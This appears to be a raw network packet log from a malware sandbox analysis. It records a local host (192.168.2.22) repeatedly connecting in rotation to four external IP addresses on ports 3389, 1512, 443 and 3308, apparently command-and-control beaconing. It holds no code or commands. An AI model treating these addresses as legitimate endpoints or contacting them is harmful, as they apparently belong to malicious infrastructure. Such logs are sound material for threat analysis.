Jan 12, 2021 07:43:47.251188993 CET	49192	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:47.305160046 CET	3389	49192	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:47.305381060 CET	49192	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:47.345323086 CET	3389	49192	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:47.359253883 CET	3389	49192	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:47.359270096 CET	3389	49192	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:47.450440884 CET	3389	49192	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:47.450483084 CET	3389	49192	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:47.450558901 CET	49192	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:47.451819897 CET	49192	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:47.456439972 CET	49192	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:47.510652065 CET	3389	49192	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:47.563615084 CET	49193	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:47.617153883 CET	1512	49193	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:47.617254019 CET	49193	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:47.618046045 CET	49193	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:47.670737028 CET	1512	49193	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:47.678029060 CET	1512	49193	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:47.678059101 CET	1512	49193	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:47.678122044 CET	49193	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:47.678560972 CET	49193	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:47.687249899 CET	49193	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:47.741070986 CET	1512	49193	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:47.741235971 CET	49193	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:47.748253107 CET	49193	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:47.748406887 CET	49193	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:47.801929951 CET	1512	49193	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:47.802023888 CET	49193	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:47.837409973 CET	1512	49193	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:47.854825974 CET	1512	49193	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:47.854844093 CET	1512	49193	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:47.955754995 CET	1512	49193	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:47.955786943 CET	1512	49193	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:47.955841064 CET	49193	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:47.957995892 CET	49193	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:47.958015919 CET	49193	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:48.010678053 CET	1512	49193	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:48.062052965 CET	49194	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:48.114336014 CET	443	49194	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:48.114463091 CET	49194	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:48.116007090 CET	49194	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:48.168236017 CET	443	49194	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:48.184794903 CET	443	49194	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:48.184879065 CET	49194	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:48.194143057 CET	49194	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:48.248615980 CET	443	49194	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:48.248739958 CET	49194	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:48.260529041 CET	49194	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:48.260672092 CET	49194	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:48.312673092 CET	443	49194	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:48.312762022 CET	49194	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:48.364820957 CET	443	49194	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:48.483613968 CET	443	49194	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:48.483639002 CET	443	49194	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:48.483726978 CET	49194	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:48.488881111 CET	49194	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:48.540977001 CET	443	49194	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:48.607235909 CET	49195	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:48.650752068 CET	3308	49195	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:48.650836945 CET	49195	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:48.651635885 CET	49195	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:48.694709063 CET	3308	49195	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:48.705313921 CET	3308	49195	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:48.705341101 CET	3308	49195	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:48.705396891 CET	49195	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:48.705424070 CET	49195	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:48.718552113 CET	49195	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:48.763452053 CET	3308	49195	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:48.763552904 CET	49195	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:48.768531084 CET	49195	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:48.768676043 CET	49195	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:48.811737061 CET	3308	49195	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:48.811938047 CET	49195	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:48.851999044 CET	3308	49195	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:48.855169058 CET	3308	49195	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:48.968128920 CET	3308	49195	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:48.968148947 CET	3308	49195	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:48.968230963 CET	49195	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:48.970649958 CET	49195	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:49.013724089 CET	3308	49195	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:49.080022097 CET	49196	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:49.133604050 CET	3389	49196	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:49.133713961 CET	49196	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:49.142256021 CET	49196	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:49.195578098 CET	3389	49196	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:49.214757919 CET	3389	49196	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:49.214780092 CET	3389	49196	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:49.214848042 CET	49196	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:49.225452900 CET	49196	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:49.285140991 CET	3389	49196	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:49.285320044 CET	49196	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:49.294066906 CET	49196	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:49.294212103 CET	49196	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:49.348362923 CET	3389	49196	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:49.348501921 CET	49196	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:49.387681961 CET	3389	49196	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:49.404562950 CET	3389	49196	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:49.404592037 CET	3389	49196	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:49.494514942 CET	3389	49196	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:49.494540930 CET	3389	49196	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:49.494678974 CET	49196	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:49.497189045 CET	49196	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:49.550548077 CET	3389	49196	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:49.609611988 CET	49197	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:49.662441969 CET	1512	49197	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:49.662530899 CET	49197	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:49.664061069 CET	49197	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:49.716877937 CET	1512	49197	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:49.723835945 CET	1512	49197	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:49.723860979 CET	1512	49197	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:49.723932028 CET	49197	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:49.741985083 CET	49197	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:49.796070099 CET	1512	49197	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:49.796186924 CET	49197	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:49.803299904 CET	49197	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:49.803513050 CET	49197	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:49.856178999 CET	1512	49197	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:49.856260061 CET	49197	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:49.893548012 CET	1512	49197	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:49.909528017 CET	1512	49197	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:50.013511896 CET	1512	49197	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:50.013541937 CET	1512	49197	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:50.013704062 CET	49197	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:50.019334078 CET	49197	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:50.072108984 CET	1512	49197	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:50.136023045 CET	49198	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:50.188240051 CET	443	49198	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:50.188333988 CET	49198	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:50.189460039 CET	49198	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:50.241744041 CET	443	49198	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:50.256206989 CET	443	49198	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:50.256308079 CET	49198	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:50.265197039 CET	49198	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:50.319643021 CET	443	49198	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:50.319818020 CET	49198	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:50.331927061 CET	49198	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:50.332077026 CET	49198	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:50.384757996 CET	443	49198	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:50.385035992 CET	49198	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:50.422797918 CET	443	49198	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:50.437482119 CET	443	49198	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:50.557164907 CET	443	49198	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:50.557195902 CET	443	49198	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:50.557342052 CET	49198	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:50.563082933 CET	49198	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:50.615638971 CET	443	49198	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:50.684366941 CET	49199	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:50.727528095 CET	3308	49199	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:50.727621078 CET	49199	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:50.728327036 CET	49199	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:50.771428108 CET	3308	49199	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:50.782216072 CET	3308	49199	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:50.782258034 CET	3308	49199	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:50.782311916 CET	49199	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:50.782340050 CET	49199	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:50.794823885 CET	49199	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:50.839884043 CET	3308	49199	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:50.840063095 CET	49199	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:50.846364021 CET	49199	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:50.846425056 CET	49199	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:50.889566898 CET	3308	49199	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:50.889786959 CET	49199	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:50.929907084 CET	3308	49199	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:50.932930946 CET	3308	49199	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:50.932991982 CET	3308	49199	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:51.046569109 CET	3308	49199	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:51.046596050 CET	3308	49199	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:51.046827078 CET	49199	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:51.072948933 CET	49199	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:51.116090059 CET	3308	49199	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:51.213325024 CET	49200	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:51.266868114 CET	3389	49200	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:51.266947985 CET	49200	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:51.268345118 CET	49200	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:51.321593046 CET	3389	49200	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:51.345705032 CET	3389	49200	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:51.345747948 CET	3389	49200	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:51.345810890 CET	49200	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:51.349031925 CET	49200	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:51.359527111 CET	49200	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:51.421740055 CET	3389	49200	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:51.421896935 CET	49200	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:51.427357912 CET	49200	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:51.427452087 CET	49200	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:51.480911970 CET	3389	49200	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:51.481106997 CET	49200	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:51.520139933 CET	3389	49200	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:51.534389019 CET	3389	49200	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:51.534430027 CET	3389	49200	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:51.624351978 CET	3389	49200	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:51.624419928 CET	3389	49200	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:51.624555111 CET	49200	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:51.717577934 CET	49200	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:51.770489931 CET	3389	49200	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:51.825009108 CET	49201	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:51.877722025 CET	1512	49201	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:51.877850056 CET	49201	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:51.880331993 CET	49201	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:51.933041096 CET	1512	49201	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:51.939749956 CET	1512	49201	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:51.939781904 CET	1512	49201	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:51.939955950 CET	49201	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:51.940006018 CET	49201	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:51.953717947 CET	49201	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:52.007707119 CET	1512	49201	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:52.007899046 CET	49201	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:52.014517069 CET	49201	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:52.014739037 CET	49201	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:52.067919970 CET	1512	49201	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:52.068124056 CET	49201	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:52.105487108 CET	1512	49201	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:52.120883942 CET	1512	49201	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:52.120910883 CET	1512	49201	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:52.224714041 CET	1512	49201	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:52.224734068 CET	1512	49201	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:52.224809885 CET	49201	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:52.227864027 CET	49201	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:52.280561924 CET	1512	49201	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:52.337707996 CET	49202	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:52.390008926 CET	443	49202	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:52.390194893 CET	49202	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:52.519484043 CET	49202	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:52.571822882 CET	443	49202	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:52.587001085 CET	443	49202	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:52.587173939 CET	49202	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:53.668236017 CET	49202	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:53.723038912 CET	443	49202	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:53.723113060 CET	49202	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:53.730180025 CET	49202	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:53.730423927 CET	49202	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:53.782584906 CET	443	49202	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:53.782802105 CET	49202	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:53.818882942 CET	443	49202	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:53.835582018 CET	443	49202	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:53.953665018 CET	443	49202	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:53.953689098 CET	443	49202	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:53.953972101 CET	49202	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:53.957284927 CET	49202	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:54.009361029 CET	443	49202	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:54.072731018 CET	49203	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:54.115830898 CET	3308	49203	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:54.116005898 CET	49203	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:54.117482901 CET	49203	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:54.160460949 CET	3308	49203	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:54.171911001 CET	3308	49203	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:54.171932936 CET	3308	49203	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:54.172008991 CET	49203	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:54.181310892 CET	49203	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:54.226407051 CET	3308	49203	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:54.226466894 CET	49203	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:54.232506990 CET	49203	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:54.232693911 CET	49203	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:54.275628090 CET	3308	49203	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:54.275806904 CET	49203	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:54.314876080 CET	3308	49203	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:54.318748951 CET	3308	49203	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:54.318766117 CET	3308	49203	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:54.431763887 CET	3308	49203	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:54.431785107 CET	3308	49203	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:54.432090044 CET	49203	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:54.438568115 CET	49203	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:54.481621981 CET	3308	49203	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:54.555577993 CET	49204	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:54.609846115 CET	3389	49204	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:54.609954119 CET	49204	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:54.611208916 CET	49204	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:54.664482117 CET	3389	49204	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:54.682509899 CET	3389	49204	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:54.682545900 CET	3389	49204	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:54.682610035 CET	49204	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:54.693217039 CET	49204	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:54.751285076 CET	3389	49204	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:54.751564980 CET	49204	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:54.756988049 CET	49204	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:54.757103920 CET	49204	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:54.810539961 CET	3389	49204	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:54.810847044 CET	49204	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:54.850239992 CET	3389	49204	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:54.864238977 CET	3389	49204	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:54.864260912 CET	3389	49204	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:54.960011959 CET	3389	49204	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:54.960031033 CET	3389	49204	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:54.960324049 CET	49204	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:54.966048002 CET	49204	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:55.019789934 CET	3389	49204	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:55.087352037 CET	49205	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:55.140435934 CET	1512	49205	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:55.140568018 CET	49205	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:55.142282963 CET	49205	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:55.195460081 CET	1512	49205	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:55.202183962 CET	1512	49205	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:55.202213049 CET	1512	49205	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:55.202275991 CET	49205	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:55.219157934 CET	49205	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:55.377970934 CET	1512	49205	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:55.378241062 CET	49205	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:55.387578964 CET	49205	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:55.387842894 CET	49205	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:55.440613985 CET	1512	49205	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:55.440793037 CET	49205	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:55.477401972 CET	1512	49205	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:55.493711948 CET	1512	49205	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:55.595478058 CET	1512	49205	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:55.595527887 CET	1512	49205	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:55.595742941 CET	49205	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:55.601484060 CET	49205	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:55.662132978 CET	1512	49205	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:55.706059933 CET	49206	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:55.758244038 CET	443	49206	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:55.758388042 CET	49206	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:55.760067940 CET	49206	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:55.812052965 CET	443	49206	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:55.827255964 CET	443	49206	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:55.827395916 CET	49206	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:55.836563110 CET	49206	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:55.891143084 CET	443	49206	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:55.891381025 CET	49206	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:55.900115013 CET	49206	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:55.900253057 CET	49206	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:55.952291012 CET	443	49206	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:55.952526093 CET	49206	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:56.004388094 CET	443	49206	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:56.123378992 CET	443	49206	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:56.123411894 CET	443	49206	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:56.123483896 CET	49206	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:56.126553059 CET	49206	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:56.178437948 CET	443	49206	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:56.240967989 CET	49207	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:56.284559011 CET	3308	49207	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:56.284917116 CET	49207	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:56.287051916 CET	49207	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:56.330137968 CET	3308	49207	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:56.340702057 CET	3308	49207	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:56.340720892 CET	3308	49207	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:56.340883017 CET	49207	3308	192.168.2.22	80.86.91.27
